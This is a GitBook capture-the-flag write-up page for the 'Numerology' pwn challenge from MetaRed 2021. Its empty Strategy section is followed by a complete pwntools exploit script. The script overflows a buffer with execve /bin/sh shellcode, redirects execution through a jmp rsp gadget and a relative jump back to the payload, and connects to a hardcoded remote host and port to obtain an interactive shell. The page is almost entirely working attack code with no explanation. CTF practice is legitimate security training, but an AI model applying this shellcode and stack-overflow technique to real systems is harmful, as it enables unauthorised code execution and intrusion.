CTF - Info/Codes/Notes
  • Writeups SkyMas 2021
  • ☠️DeadFace
    • Dead Men Tell No Tales
    • The Count
    • Window Pains
    • Window Pains 2
    • Window Pains 3
    • Window Pains 4
    • You Shall not Pass
  • 🇵🇹Jornadas 2021
    • Return that ROPe
    • IPv6
  • 👁️BuckeyeCTF 2021
    • Canary
    • Tesseract
    • StegBot
    • SOP
    • Jupyter
    • Curly fries
    • Sozu
    • BASIC
    • Ret4win
    • Flattened
    • Defective RSA
  • 👑KillerQueen CTF
    • Web
      • Jail Web
    • PWN
      • Broke Collage Students
      • A Kind of Magic
      • Tweety Birb
      • Zoom2Win
    • Not mine :D
  • 🔺CTF Int. MetaRed 2021 - 3rd STAGE
    • PWN
      • Numerology
      • NoteServer
Powered by GitBook
On this page
  • Strategy
  • Exploit
  1. CTF Int. MetaRed 2021 - 3rd STAGE
  2. PWN

Numerology

PreviousPWNNextNoteServer

Last updated 3 years ago

Strategy

Exploit

#!/usr/bin/env python3

from pwn import *

exe = ELF("./numerology")
context.log_level = 'info'
args.LOCAL=False
args.DEBUG=True
context.binary = exe


def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r,gdbscript="""
    
        
        
       """)
    else:
        r = remote("143.255.251.233", 13373)

    return r


def main():
    #0x000000000040119e : jmp rsp # ROP to JMP RSP for Execute our Shellcode
    offjmp4 = 0x72 # Offset JMP to JMP from our Stack pos to the position of the Shellcode
    shell=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05' #Shellcode
    
    offset=36-len(shell) # 36 is our Overflow, So this takes Shell - 36 to add PAD
    
    r = conn()
    
    r.sendline(b'A'*offset + shell + p64(0x000000000040119e) +asm('jmp $-'+hex(offjmp4)))

    r.interactive()


if __name__ == "__main__":
    main()
🔺